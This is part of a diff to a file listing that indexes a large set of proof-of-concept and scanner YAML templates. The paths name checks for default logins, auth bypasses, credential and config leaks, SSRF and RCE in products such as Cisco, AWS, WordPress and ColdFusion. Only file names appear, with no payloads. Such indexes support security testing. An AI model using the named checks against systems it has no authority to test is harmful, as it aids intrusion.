./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml
./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml
@@ -4258,16 +4230,16 @@
./poc/auth/versa-director-login.yaml
./poc/auth/versa-flexvnf-ui-default-login.yaml
./poc/auth/vidyo-default-login-11008.yaml
-./poc/auth/vidyo-default-login-11009.yaml
-./poc/auth/vidyo-default-login.yaml
+./poc/auth/vidyo-default-login-11010.yaml
./poc/auth/vidyo-login.yaml
+./poc/auth/vigor-login-11020.yaml
./poc/auth/vigor-login-11021.yaml
./poc/auth/vigor-login-11022.yaml
-./poc/auth/vigor-login-11023.yaml
./poc/auth/vigor-login-page-2000-series.yaml
./poc/auth/vigor-login-page.yaml
./poc/auth/vigor-login.yaml
./poc/auth/visionhub-default-credentials.yaml
+./poc/auth/visionhub-default-login-11026.yaml
./poc/auth/visionhub-default-login-11027.yaml
./poc/auth/visionhub-default-login-11028.yaml
./poc/auth/visionhub-default-login-11029.yaml
@@ -4277,8 +4249,8 @@
./poc/auth/vmware-hcx-login.yaml
./poc/auth/vmware-nsx-login.yaml
./poc/auth/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
+./poc/auth/vpms-auth-bypass-11066.yaml
./poc/auth/vpms-auth-bypass-11067.yaml
-./poc/auth/vpms-auth-bypass-11068.yaml
./poc/auth/vpms-auth-bypass-11069.yaml
./poc/auth/vpms-auth-bypass.yaml
./poc/auth/vrealize-loginsight-panel.yaml
@@ -4287,8 +4259,8 @@
./poc/auth/wanhuOA-default-login.yaml
./poc/auth/wanhuOA-sqli-outMailLoginCheck.yaml
./poc/auth/watchguard-credentials-disclosure-11105.yaml
-./poc/auth/watchguard-credentials-disclosure-11106.yaml
./poc/auth/watchguard-credentials-disclosure-11107.yaml
+./poc/auth/watchguard-credentials-disclosure.yaml
./poc/auth/wayos-ac-centralized-management-system-default-weak-password.yaml
./poc/auth/wayos-default-password.yaml
./poc/auth/wazuh-default-login.yaml
@@ -4304,7 +4276,6 @@
./poc/auth/web3-authentication.yaml
./poc/auth/weblogic-login-11150.yaml
./poc/auth/weblogic-login.yaml
-./poc/auth/weblogic-weak-login-11154.yaml
./poc/auth/weblogic-weak-login-11155.yaml
./poc/auth/weblogic-weak-login-11156.yaml
./poc/auth/webmethod-integration-default-login.yaml
@@ -4322,7 +4293,6 @@
./poc/auth/wifisky-default-login-11203.yaml
./poc/auth/wifisky-default-login-11204.yaml
./poc/auth/wifisky-default-login.yaml
-./poc/auth/wifisky-default-password-11205.yaml
./poc/auth/wifisky-default-password-11206.yaml
./poc/auth/wifisky-default-password-cnvd-2021-39012.yml
./poc/auth/wifisky-default-password.yaml
@@ -4339,7 +4309,6 @@
./poc/auth/wordpress-infinitewp-auth-bypass-11285.yaml
./poc/auth/wordpress-infinitewp-auth-bypass-11286.yaml
./poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml
-./poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml
./poc/auth/wordpress-infinitewp-auth-bypass-11289.yaml
./poc/auth/wordpress-infinitewp-auth-bypass.yaml
./poc/auth/wordpress-login-11293.yaml
@@ -4356,7 +4325,7 @@
./poc/auth/wordpress-updraftplus-pem-key.yaml
./poc/auth/wordpress-weak-credentials-11334.yaml
./poc/auth/wordpress-weak-credentials-11335.yaml
-./poc/auth/wordpress-weak-credentials-11337.yaml
+./poc/auth/wordpress-weak-credentials-11336.yaml
./poc/auth/wordpress-weak-credentials.yaml
./poc/auth/wp-activate-register-redirect.yaml
./poc/auth/wp-cookie-user-info-d2666c85e1e86cfe042cf280f363f5ef.yaml
@@ -4441,8 +4410,8 @@
./poc/auth/wpconfig-aws-keys-1.yaml
./poc/auth/wpconfig-aws-keys-2.yaml
./poc/auth/wpconfig-aws-keys.yaml
+./poc/auth/wpdm-cache-session-11436.yaml
./poc/auth/wpdm-cache-session-11437.yaml
-./poc/auth/wpdm-cache-session-11438.yaml
./poc/auth/wpdm-cache-session-11439.yaml
./poc/auth/wpdm-cache-session.yaml
./poc/auth/wpmudev-pub-keys-11504.yaml
@@ -4481,20 +4450,19 @@
./poc/auth/wso2-default-login-11640.yaml
./poc/auth/wso2-default-login-11641.yaml
./poc/auth/wso2-default-login-11642.yaml
-./poc/auth/wso2-default-login.yaml
./poc/auth/wso2-default-password.yaml
./poc/auth/xenforo-login-11670.yaml
./poc/auth/xenforo-login-11671.yaml
./poc/auth/xenforo-login-11672.yaml
-./poc/auth/xenforo-login-11674.yaml
./poc/auth/xenforo-login.yaml
+./poc/auth/xenmobile-login-11675.yaml
./poc/auth/xenmobile-login-11676.yaml
-./poc/auth/xenmobile-login-11677.yaml
./poc/auth/xenmobile-login.yaml
./poc/auth/xerox-workcentre7-default-password.yaml
./poc/auth/xerox7-default-login-11678.yaml
./poc/auth/xerox7-default-login-11679.yaml
./poc/auth/xerox7-default-login-11680.yaml
+./poc/auth/xerox7-default-login.yaml
./poc/auth/xerox7-default-password.yaml
./poc/auth/xiaomi-wireless-router-login.yaml
./poc/auth/xibocms-login.yaml
@@ -4503,9 +4471,9 @@
./poc/auth/xvr-login-11702.yaml
./poc/auth/xvr-login-11703.yaml
./poc/auth/xvr-login-11704.yaml
+./poc/auth/xvr-login-11705.yaml
./poc/auth/xvr-login-11706.yaml
./poc/auth/xvr-login.yaml
-./poc/auth/xxljob-default-login-11709.yaml
./poc/auth/xxljob-default-login-11710.yaml
./poc/auth/xxljob-default-login-11711.yaml
./poc/auth/xxljob-default-login-11712.yaml
@@ -4552,25 +4520,28 @@
./poc/auth/zabbix-default-password.yml
./poc/auth/zabbix-server-login-11767.yaml
./poc/auth/zabbix-server-login-11768.yaml
+./poc/auth/zabbix-server-login-11769.yaml
./poc/auth/zabbix-server-login-11770.yaml
./poc/auth/zabbix-server-login.yaml
./poc/auth/zapier-webhook-token-11771.yaml
./poc/auth/zenario-login-panel-11776.yaml
./poc/auth/zenario-login-panel.yaml
./poc/auth/zentao-zentaosid-auth-bypass.yaml
+./poc/auth/zeroshell-login-11788.yaml
./poc/auth/zeroshell-login-11789.yaml
-./poc/auth/zeroshell-login-11790.yaml
./poc/auth/zeroshell-login.yaml
-./poc/auth/zhiyuan-oa-session-leak-11801.yaml
+./poc/auth/zhiyuan-oa-session-leak-11802.yaml
./poc/auth/zhiyuan-oa-session-leak-11803.yaml
./poc/auth/zhiyuan-oa-session-leak-11804.yaml
./poc/auth/zhiyuan-oa-session-leak-11805.yaml
+./poc/auth/zhiyuan-oa-session-leak.yaml
+./poc/auth/zhiyuan-oa-unauthorized-11806.yaml
./poc/auth/zhiyuan-oa-unauthorized-11807.yaml
-./poc/auth/zhiyuan-oa-unauthorized-11808.yaml
./poc/auth/zhiyuan-oa-unauthorized.yaml
./poc/auth/zhiyuan-session-leakage.yaml
./poc/auth/zimbra-preauth-ssrf-11809.yaml
./poc/auth/zimbra-preauth-ssrf-11810.yaml
+./poc/auth/zimbra-preauth-ssrf.yaml
./poc/auth/zimbra-web-login.yaml
./poc/auth/zipkin-unauth-11823.yaml
./poc/auth/zipkin-unauth.yaml
@@ -4583,8 +4554,8 @@
./poc/auth/zmanda-default-login-11827.yaml
./poc/auth/zmanda-default-login-11828.yaml
./poc/auth/zms-auth-bypass-11829.yaml
+./poc/auth/zms-auth-bypass-11830.yaml
./poc/auth/zms-auth-bypass-11831.yaml
-./poc/auth/zms-auth-bypass-11832.yaml
./poc/auth/zms-auth-bypass.yaml
./poc/auth/zoho-webhook-token-11835.yaml
./poc/auth/zoho-webhook-token-11836.yaml
@@ -4748,9 +4719,8 @@
./poc/aws/amazon-auto-links-plugin.yaml
./poc/aws/amazon-auto-links.yaml
./poc/aws/amazon-docker-config-279.yaml
-./poc/aws/amazon-docker-config-280.yaml
-./poc/aws/amazon-docker-config-disclosure-278.yaml
./poc/aws/amazon-docker-config-disclosure.yaml
+./poc/aws/amazon-docker-config.yaml
./poc/aws/amazon-ec2-ssrf.yaml
./poc/aws/amazon-einzeltitellinks-6c575ce7bdb8499dce4ce35ed88e8474.yaml
./poc/aws/amazon-einzeltitellinks.yaml
@@ -4788,20 +4758,19 @@
./poc/aws/arconix-faq-03fd7fbcfd3967eecec2212a351e2737.yaml
./poc/aws/arconix-shortcodes-03fd7fbcfd3967eecec2212a351e2737.yaml
./poc/aws/armember-membership-76d089af6b78d98ec2c18a1732ae08c5.yaml
-./poc/aws/aws-access-id-618.yaml
./poc/aws/aws-access-id-619.yaml
-./poc/aws/aws-access-id-620.yaml
./poc/aws/aws-access-id.yaml
./poc/aws/aws-access-key-value-622.yaml
./poc/aws/aws-access-key-value-623.yaml
+./poc/aws/aws-access-key-value-624.yaml
./poc/aws/aws-access-key-value-625.yaml
./poc/aws/aws-access-key-value.yaml
./poc/aws/aws-access-key.yaml
./poc/aws/aws-app-enum.yaml
./poc/aws/aws-bucket-service-626.yaml
./poc/aws/aws-bucket-service-627.yaml
-./poc/aws/aws-bucket-service-628.yaml
./poc/aws/aws-bucket-service-629.yaml
+./poc/aws/aws-bucket-service.yaml
./poc/aws/aws-bucket-takeover-630.yaml
./poc/aws/aws-bucket-takeover-631.yaml
./poc/aws/aws-bucket-takeover.yaml
@@ -4809,11 +4778,9 @@
./poc/aws/aws-cdn-by-wpadmin.yaml
./poc/aws/aws-cloudfront-service-633.yaml
./poc/aws/aws-cloudfront-service-634.yaml
-./poc/aws/aws-cloudfront-service-635.yaml
./poc/aws/aws-code-env.yaml
./poc/aws/aws-cognito-636.yaml
./poc/aws/aws-cognito-637.yaml
-./poc/aws/aws-cognito-638.yaml
./poc/aws/aws-cognito.yaml
./poc/aws/aws-config-not-enabled.yaml
./poc/aws/aws-ec2-autoscale.yaml
@@ -4821,12 +4788,10 @@
./poc/aws/aws-ec2.yaml
./poc/aws/aws-ecs-container-agent-tasks-639.yaml
./poc/aws/aws-ecs-container-agent-tasks-640.yaml
-./poc/aws/aws-ecs-container-agent-tasks-641.yaml
./poc/aws/aws-ecs-container-agent-tasks.yaml
./poc/aws/aws-elastic-beanstalk-detect-642.yaml
./poc/aws/aws-elastic-beanstalk-detect-643.yaml
./poc/aws/aws-elastic-beanstalk-detect-644.yaml
-./poc/aws/aws-elastic-beanstalk-detect.yaml
./poc/aws/aws-elastic-beanstalk.yaml
./poc/aws/aws-metadata.yaml
./poc/aws/aws-mfa-not-enabled.yaml
@@ -4834,9 +4799,10 @@
./poc/aws/aws-object-listing-646.yaml
./poc/aws/aws-object-listing-647.yaml
./poc/aws/aws-object-listing.yaml
-./poc/aws/aws-opensearch-login-650.yaml
+./poc/aws/aws-opensearch-login-649.yaml
./poc/aws/aws-opensearch-login.yaml
./poc/aws/aws-rds-cluster.yaml
+./poc/aws/aws-redirect-651.yaml
./poc/aws/aws-redirect-652.yaml
./poc/aws/aws-redirect-653.yaml
./poc/aws/aws-redirect-654.yaml
@@ -4852,11 +4818,11 @@
./poc/aws/awstats-config-1.yaml
./poc/aws/awstats-config-2.yaml
./poc/aws/awstats-config-655.yaml
-./poc/aws/awstats-config.yaml
+./poc/aws/awstats-config-656.yaml
./poc/aws/awstats-script-1.yaml
./poc/aws/awstats-script-2.yaml
./poc/aws/awstats-script-3.yaml
-./poc/aws/awstats-script-658.yaml
+./poc/aws/awstats-script-657.yaml
./poc/aws/awstats-script.yaml
./poc/aws/ays-facebook-popup-likebox-4d80be371c08993d257d71a67ec23c4b.yaml
./poc/aws/best-woocommerce-feed-b97fc2565dd574eec2be30a866171222.yaml
@@ -4909,7 +4875,7 @@
./poc/aws/easy-social-share-buttons3.yaml
./poc/aws/easy-testimonials-63219e4a52f76a6b0555468e9ceec2c8.yaml
./poc/aws/ec2-detection-7161.yaml
-./poc/aws/ec2-detection-7162.yaml
+./poc/aws/ec2-detection-7163.yaml
./poc/aws/ec2-imdsv2.yaml
./poc/aws/ec2-instance-information.yaml
./poc/aws/ec2-public-ip.yaml
@@ -4961,7 +4927,6 @@
./poc/aws/metadata-aws-8810.yaml
./poc/aws/metadata-aws-8811.yaml
./poc/aws/metadata-aws-8812.yaml
-./poc/aws/metadata-aws.yaml
./poc/aws/mime-types-extended-da21a491c0c1b70fec28427963a101bc.yaml
./poc/aws/miniorange-saml-20-single-sign-on-c1ec21b40a223f72a0391ca004186868.yaml
./poc/aws/nd-restaurant-reservations-61b4800084edec2087aa04c88795185e.yaml
@@ -5018,7 +4983,7 @@
./poc/aws/s3-sensitive-api.yaml
./poc/aws/s3-server-side-encryption.yaml
./poc/aws/s3-subtakeover-9967.yaml
-./poc/aws/s3-subtakeover-9968.yaml
+./poc/aws/s3-subtakeover-9969.yaml
./poc/aws/s3-subtakeover.yaml
./poc/aws/s3-versioning.yaml
./poc/aws/s3-video-1e3ee3e7b398636c16a13429ce61da87.yaml
@@ -5252,7 +5217,7 @@
./poc/backup/database-backups-2c3b52741f120d634a1b6cf5bf4454f6.yaml
./poc/backup/database-backups.yaml
./poc/backup/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml
-./poc/backup/db-backup-lfi-6774.yaml
+./poc/backup/db-backup-lfi-6775.yaml
./poc/backup/db-backup-lfi-6776.yaml
./poc/backup/db-backup-lfi.yaml
./poc/backup/db-backup.yaml
@@ -5314,19 +5279,19 @@
./poc/backup/php-backup-files-7.yaml
./poc/backup/php-backup-files-8.yaml
./poc/backup/php-backup-files-9.yaml
-./poc/backup/php-backup-files-9497.yaml
+./poc/backup/php-backup-files-9498.yaml
./poc/backup/php-backup-files.yaml
./poc/backup/phpmybackuppro.yaml
./poc/backup/rds-backup-enable.yaml
./poc/backup/recent-backups-aecbf28838f410f4e37aa987e88ec484.yaml
./poc/backup/recent-backups.yaml
+./poc/backup/server-backup-login-10153.yaml
./poc/backup/server-backup-login-10154.yaml
./poc/backup/server-backup-login-10155.yaml
-./poc/backup/server-backup-login-10156.yaml
./poc/backup/server-backup-login.yaml
-./poc/backup/server-backup-manager-se-10157.yaml
./poc/backup/server-backup-manager-se-10158.yaml
./poc/backup/server-backup-manager-se-10159.yaml
+./poc/backup/server-backup-manager-se-10160.yaml
./poc/backup/server-backup-manager-se-10161.yaml
./poc/backup/server-backup-manager-se-login-detect.yaml
./poc/backup/server-backup-manager-se.yaml
@@ -5350,8 +5315,8 @@
./poc/backup/wordpress-db-backup-listing-11250.yaml
./poc/backup/wordpress-db-backup-listing.yaml
./poc/backup/wordpress-db-backup.yaml
-./poc/backup/wordpress-total-upkeep-backup-download-11322.yaml
./poc/backup/wordpress-total-upkeep-backup-download-11323.yaml
+./poc/backup/wordpress-total-upkeep-backup-download-11324.yaml
./poc/backup/wordpress-total-upkeep-backup-download.yaml
./poc/backup/wp-all-backup-1de8fa81dd8966d653962310f7ca2926.yaml
./poc/backup/wp-all-backup.yaml
@@ -5502,15 +5467,15 @@
./poc/cisco/cisco-asa-panel.yaml
./poc/cisco/cisco-asa-version.yaml
./poc/cisco/cisco-asa-workflow.yaml
-./poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
+./poc/cisco/cisco-cloudcenter-suite-rce.yaml
./poc/cisco/cisco-cve-2020-3452-readfile.yml
./poc/cisco/cisco-edge-340-937.yaml
./poc/cisco/cisco-edge-340.yaml
./poc/cisco/cisco-email-security-detect.yaml
./poc/cisco/cisco-expressway-panel.yaml
./poc/cisco/cisco-expressway.yaml
-./poc/cisco/cisco-finesse-login-938.yaml
./poc/cisco/cisco-finesse-login-939.yaml
+./poc/cisco/cisco-finesse-login-940.yaml
./poc/cisco/cisco-finesse-login.yaml
./poc/cisco/cisco-finger-detect.yaml
./poc/cisco/cisco-imc-supervisor.yaml
@@ -5521,32 +5486,30 @@
./poc/cisco/cisco-ios-xe-panel.yaml
./poc/cisco/cisco-iox.yaml
./poc/cisco/cisco-meeting-app.yaml
+./poc/cisco/cisco-meraki-exposure-944.yaml
./poc/cisco/cisco-meraki-exposure-945.yaml
-./poc/cisco/cisco-meraki-exposure-946.yaml
./poc/cisco/cisco-meraki-exposure.yaml
./poc/cisco/cisco-meraki-workflow.yaml
./poc/cisco/cisco-network-config-947.yaml
./poc/cisco/cisco-network-config-948.yaml
-./poc/cisco/cisco-network-config-949.yaml
./poc/cisco/cisco-network-config-950.yaml
./poc/cisco/cisco-network-config-951.yaml
+./poc/cisco/cisco-network-config.yaml
./poc/cisco/cisco-nexus-data-broker.yaml
./poc/cisco/cisco-onprem-panel.yaml
-./poc/cisco/cisco-prime-infrastructure-952.yaml
./poc/cisco/cisco-prime-infrastructure-953.yaml
+./poc/cisco/cisco-prime-infrastructure-954.yaml
./poc/cisco/cisco-prime-infrastructure.yaml
./poc/cisco/cisco-prime-network-registrar.yaml
./poc/cisco/cisco-rv-series-rce.yaml
+./poc/cisco/cisco-sd-wan-955.yaml
./poc/cisco/cisco-sd-wan-956.yaml
-./poc/cisco/cisco-sd-wan-957.yaml
./poc/cisco/cisco-sd-wan.yaml
./poc/cisco/cisco-secure-cn-959.yaml
./poc/cisco/cisco-secure-cn.yaml
./poc/cisco/cisco-secure-desktop-960.yaml
./poc/cisco/cisco-secure-desktop-961.yaml
-./poc/cisco/cisco-secure-desktop-962.yaml
./poc/cisco/cisco-secure-desktop.yaml
-./poc/cisco/cisco-security-details-963.yaml
./poc/cisco/cisco-security-details-964.yaml
./poc/cisco/cisco-security-details.yaml
./poc/cisco/cisco-sendgrid-965.yaml
@@ -5554,19 +5517,19 @@
./poc/cisco/cisco-sendgrid-968.yaml
./poc/cisco/cisco-sendgrid.yaml
./poc/cisco/cisco-smi-exposure-970.yaml
-./poc/cisco/cisco-smi-exposure-972.yaml
+./poc/cisco/cisco-smi-exposure-971.yaml
./poc/cisco/cisco-smi-exposure.yaml
./poc/cisco/cisco-ssl-vpn.yaml
+./poc/cisco/cisco-systems-login-973.yaml
./poc/cisco/cisco-systems-login-974.yaml
-./poc/cisco/cisco-systems-login-975.yaml
./poc/cisco/cisco-systems-login.yaml
+./poc/cisco/cisco-telepresence-976.yaml
./poc/cisco/cisco-telepresence-977.yaml
-./poc/cisco/cisco-telepresence-978.yaml
./poc/cisco/cisco-telepresence.yaml
./poc/cisco/cisco-ucm.yaml
./poc/cisco/cisco-ucs-director-panel-detect.yaml
./poc/cisco/cisco-ucs-director.yaml
-./poc/cisco/cisco-ucs-kvm-login-980.yaml
+./poc/cisco/cisco-ucs-kvm-login-979.yaml
./poc/cisco/cisco-ucs-kvm-login.yaml
./poc/cisco/cisco-unity-express-panel-detect.yaml
./poc/cisco/cisco-unity-panel.yaml
@@ -5583,7 +5546,6 @@
./poc/coldfusion/adobe-coldfusion-detect-4.yaml
./poc/coldfusion/adobe-coldfusion-detect-5.yaml
./poc/coldfusion/adobe-coldfusion-detect-6.yaml
-./poc/coldfusion/adobe-coldfusion-detect-82.yaml
./poc/coldfusion/adobe-coldfusion-detect-83.yaml
./poc/coldfusion/adobe-coldfusion-detect-84.yaml
./poc/coldfusion/adobe-coldfusion-detector-1.yaml
@@ -5594,8 +5556,9 @@
./poc/coldfusion/adobe-coldfusion-detector-6.yaml
./poc/coldfusion/adobe-coldfusion-detector-error.yaml
./poc/coldfusion/adobe-coldfusion-error-detect-85.yaml
+./poc/coldfusion/adobe-coldfusion-error-detect-86.yaml
./poc/coldfusion/adobe-coldfusion-error-detect-87.yaml
-./poc/coldfusion/adobe-coldfusion-error-detect-88.yaml
+./poc/coldfusion/adobe-coldfusion-error-detect.yaml
./poc/coldfusion/better-messages-wcfm-integration-6477bf18cad6c823db485408d49b337b.yaml
./poc/coldfusion/better-messages-wcfm-integration-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/coldfusion/better-messages-wcfm-integration.yaml
@@ -5611,9 +5574,9 @@
./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/coldfusion/coldfusion-debug-xss-1.yaml
./poc/coldfusion/coldfusion-debug-xss-1152.yaml
+./poc/coldfusion/coldfusion-debug-xss-1153.yaml
./poc/coldfusion/coldfusion-debug-xss-1154.yaml
./poc/coldfusion/coldfusion-debug-xss-2.yaml
-./poc/coldfusion/coldfusion-debug-xss.yaml
./poc/coldfusion/coldfusion-files.yaml
./poc/coldfusion/coldfusion-lucee-auth-bypass.yaml
./poc/coldfusion/coldfusion-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -5624,6 +5587,7 @@
./poc/coldfusion/tenda-w15e-routercfm-cfg-config-leak.yaml
./poc/coldfusion/unpatched-coldfusion-10977.yaml
./poc/coldfusion/unpatched-coldfusion-10978.yaml
+./poc/coldfusion/unpatched-coldfusion-10979.yaml
./poc/coldfusion/unpatched-coldfusion.yaml
./poc/coldfusion/wcfm-marketplace-rest-api-83211a697400a39f3ef0aefc82922e72.yaml
./poc/coldfusion/wcfm-marketplace-rest-api.yaml
@@ -5649,17 +5613,16 @@
./poc/config/account-confirmation-link-manipulation.yaml
./poc/config/aem_misconfig.yaml
./poc/config/aerohive-netconfig-ui-199.yaml
+./poc/config/aerohive-netconfig-ui-200.yaml
./poc/config/aerohive-netconfig-ui-201.yaml
-./poc/config/aerohive-netconfig-ui.yaml
./poc/config/airflow-configuration-exposure-229.yaml
-./poc/config/airflow-configuration-exposure.yaml
+./poc/config/airflow-configuration-exposure-230.yaml
./poc/config/alibaba-canal-config-leak.yaml
./poc/config/amazon-docker-config-279.yaml
-./poc/config/amazon-docker-config-280.yaml
-./poc/config/amazon-docker-config-disclosure-278.yaml
./poc/config/amazon-docker-config-disclosure.yaml
+./poc/config/amazon-docker-config.yaml
./poc/config/ansible-config-disclosure-325.yaml
-./poc/config/ansible-config-disclosure.yaml
+./poc/config/ansible-config-disclosure-326.yaml
./poc/config/apache-config-343.yaml
./poc/config/apache-config-344.yaml
./poc/config/apache-config-exposure.yaml
@@ -5667,26 +5630,31 @@
./poc/config/apache-httpd-conf-disclosure.yaml
./poc/config/apache-httpd-conf-exposure.yml
./poc/config/api-iconfinder-438.yaml
+./poc/config/api-iconfinder-439.yaml
./poc/config/aws-config-not-enabled.yaml
./poc/config/aws-s3-misconfig.yaml
./poc/config/awstats-config-1.yaml
./poc/config/awstats-config-2.yaml
./poc/config/awstats-config-655.yaml
-./poc/config/awstats-config.yaml
+./poc/config/awstats-config-656.yaml
./poc/config/azure-pipelines-config-disclosure.yaml
./poc/config/basic-cors-misconfig.yaml
./poc/config/bigip-config-utility-detect-1.yaml
./poc/config/bigip-config-utility-detect-2.yaml
./poc/config/bigip-config-utility-detect-3.yaml
+./poc/config/bigip-config-utility-detect-730.yaml
./poc/config/bigip-config-utility-detect-731.yaml
+./poc/config/bigip-config-utility-detect-732.yaml
./poc/config/bigip-config-utility-detect.yaml
-./poc/config/buffalo-config-injection-798.yaml
./poc/config/buffalo-config-injection-799.yaml
+./poc/config/buffalo-config-injection-800.yaml
+./poc/config/buffalo-config-injection-801.yaml
./poc/config/buffalo-config-injection.yaml
./poc/config/cache-control-header-misconfiguration.yaml
./poc/config/child-theme-configurator.yaml
./poc/config/chinatelecomequipmentwebconfigurationsystem.yaml
./poc/config/circleci-config-922.yaml
+./poc/config/circleci-config-923.yaml
./poc/config/circleci-config-925.yaml
./poc/config/circleci-config.yaml
./poc/config/circleci-ssh-config-926.yaml
@@ -5695,9 +5663,9 @@
./poc/config/circleci-ssh-config.yaml
./poc/config/cisco-network-config-947.yaml
./poc/config/cisco-network-config-948.yaml
-./poc/config/cisco-network-config-949.yaml
./poc/config/cisco-network-config-950.yaml
./poc/config/cisco-network-config-951.yaml
+./poc/config/cisco-network-config.yaml
./poc/config/cloud-config.yaml
./poc/config/cloud-storage-misconfig.yaml
./poc/config/coep-misconfig.yaml
@@ -5713,7 +5681,8 @@
./poc/config/config-js.yaml
./poc/config/config-parameters-yml.yaml
./poc/config/config-properties.yaml
-./poc/config/config-rb-1180.yaml
+./poc/config/config-rb-1179.yaml
+./poc/config/config-rb.yaml
./poc/config/config.php.new.yaml
./poc/config/config.yaml
./poc/config/config.yml
@@ -5743,15 +5712,15 @@
./poc/config/confluence-dashboard.yaml
./poc/config/confluence-detect-1.yaml
./poc/config/confluence-detect-1186.yaml
-./poc/config/confluence-detect-1187.yaml
./poc/config/confluence-detect-1188.yaml
+./poc/config/confluence-detect-1189.yaml
./poc/config/confluence-detect-2.yaml
./poc/config/confluence-detect-3.yaml
./poc/config/confluence-detect-4.yaml
./poc/config/confluence-detect.yaml
./poc/config/confluence-ssrf-sharelinks-1190.yaml
./poc/config/confluence-ssrf-sharelinks-1191.yaml
-./poc/config/confluence-ssrf-sharelinks-1193.yaml
+./poc/config/confluence-ssrf-sharelinks-1192.yaml
./poc/config/confluence-ssrf-sharelinks-1194.yaml
./poc/config/confluence-workflow-1195.yaml
./poc/config/confluence-workflow.yaml
@@ -5765,6 +5734,7 @@
./poc/config/coremail-config-disclosure-1216.yaml
./poc/config/coremail-config-disclosure.yaml
./poc/config/cors-misconfig-1222.yaml
+./poc/config/cors-misconfig-1223.yaml
./poc/config/cors-misconfig-1224.yaml
./poc/config/debug-log-config-tool-de2ab3ada51607e8bc54fae30ad1a036.yaml
./poc/config/debug-log-config-tool.yaml
@@ -5785,13 +5755,12 @@
./poc/config/docker-compose-config-7.yaml
./poc/config/docker-compose-config-7057.yaml
./poc/config/docker-compose-config-7058.yaml
-./poc/config/docker-compose-config-7059.yaml
+./poc/config/docker-compose-config.yaml
./poc/config/docker-compose-config.yml
./poc/config/docker-misconfigured-api.yaml
./poc/config/dockercfg-config-1.yaml
./poc/config/dockercfg-config-2.yaml
./poc/config/dockercfg-config-7056.yaml
-./poc/config/dockercfg-config.yaml
./poc/config/dockerrun-aws-config-page.yaml
./poc/config/dompdf-config.yaml
./poc/config/drupal_module-config_pages-information-disclosure.yaml
@@ -5825,7 +5794,6 @@
./poc/config/firebase-config-exposure-7485.yaml
./poc/config/firebase-config-exposure-7486.yaml
./poc/config/firebase-config-exposure-7488.yaml
-./poc/config/firebase-config-exposure.yaml
./poc/config/firebase-config-file.yaml
./poc/config/firebase-config.yaml
./poc/config/fps-config.yaml
@@ -5833,13 +5801,15 @@
./poc/config/front-page-misconfig-2.yaml
./poc/config/front-page-misconfig-7545.yaml
./poc/config/front-page-misconfig-7546.yaml
+./poc/config/front-page-misconfig-7547.yaml
./poc/config/front-page-misconfig-7550.yaml
./poc/config/front-page-misconfig.yaml
+./poc/config/ftpconfig-7565.yaml
./poc/config/ftpconfig-7566.yaml
-./poc/config/ftpconfig.yaml
./poc/config/gcs-misconfig.yaml
./poc/config/git-config-7633.yaml
./poc/config/git-config-7634.yaml
+./poc/config/git-config-7635.yaml
./poc/config/git-config-7636.yaml
./poc/config/git-config-7637.yaml
./poc/config/git-config-7638.yaml
@@ -5852,20 +5822,21 @@
./poc/config/git-config-nginxoffbyslash-5.yaml
./poc/config/git-config-nginxoffbyslash-6.yaml
./poc/config/git-config-nginxoffbyslash-7.yaml
+./poc/config/git-config-nginxoffbyslash-7628.yaml
./poc/config/git-config-nginxoffbyslash-7629.yaml
+./poc/config/git-config-nginxoffbyslash-7630.yaml
./poc/config/git-config-nginxoffbyslash-7631.yaml
-./poc/config/git-config-nginxoffbyslash-7632.yaml
./poc/config/git-config-nginxoffbyslash-8.yaml
./poc/config/git-config-nginxoffbyslash-9.yaml
./poc/config/git-config-nginxoffbyslash.yaml
./poc/config/git-config.yaml
+./poc/config/github-page-config-7654.yaml
./poc/config/github-page-config-7655.yaml
./poc/config/github-page-config-7656.yaml
./poc/config/gitlab-config-exposure.yml
./poc/config/glpi-fusioninventory-misconfig.yaml
./poc/config/gocd-cruise-configuration-7746.yaml
./poc/config/gocd-cruise-configuration-7747.yaml
-./poc/config/gocd-cruise-configuration-7748.yaml
./poc/config/gocd-cruise-configuration.yaml
./poc/config/grafana-exposed-configuration.yaml
./poc/config/grandstream-device-configuration.yaml
@@ -5877,13 +5848,13 @@
./poc/config/heuristic-scanning-not-configured.yaml
./poc/config/hikvision-camera-bypass-configuration-file-download.yaml
./poc/config/honeywell-scada-config-7989.yaml
+./poc/config/honeywell-scada-config-7990.yaml
./poc/config/honeywell-scada-config-7991.yaml
-./poc/config/honeywell-scada-config-7992.yaml
-./poc/config/honeywell-scada-config.yaml
./poc/config/htaccess-config-8042.yaml
+./poc/config/htaccess-config-8043.yaml
./poc/config/htaccess-config.yaml
./poc/config/httpd-config-8054.yaml
-./poc/config/httpd-config.yaml
+./poc/config/httpd-config-8055.yaml
./poc/config/huace-Config-infoLeak.yaml
./poc/config/huace-mews-config-xml-infoleak.yaml
./poc/config/huiwen-book-config-properties-info-leak.yaml
@@ -5900,9 +5871,9 @@
./poc/config/kafka-misconfig.yaml
./poc/config/keycloak-openid-config-1.yaml
./poc/config/keycloak-openid-config-2.yaml
-./poc/config/keycloak-openid-config-8475.yaml
./poc/config/keycloak-openid-config-8476.yaml
./poc/config/keycloak-openid-config-8477.yaml
+./poc/config/keycloak-openid-config.yaml
./poc/config/login-configurator-14616c5034dd1ddef5b9442340e35c8b.yaml
./poc/config/login-configurator-aeebbaa9f5df299f369d13242d94e3a5.yaml
./poc/config/login-configurator-fe19785cecc9ded62fb9e19ffd55d7fb.yaml
@@ -5913,16 +5884,16 @@
./poc/config/magento-config-8700.yaml
./poc/config/magento-config-8701.yaml
./poc/config/magento-config-8703.yaml
-./poc/config/magento-config-disclosure.yaml
./poc/config/magento-config.yaml
./poc/config/manageengine-network-config.yaml
./poc/config/misconfig.yaml
./poc/config/misconfigured-concrete5.yaml
+./poc/config/misconfigured-docker-8900.yaml
./poc/config/misconfigured-docker-8901.yaml
-./poc/config/misconfigured-docker-8902.yaml
./poc/config/misconfigured-docker.yaml
./poc/config/misconfigured-redis.yaml
./poc/config/msmtp-config-8966.yaml
+./poc/config/msmtp-config-8967.yaml
./poc/config/nconf-panel.yaml
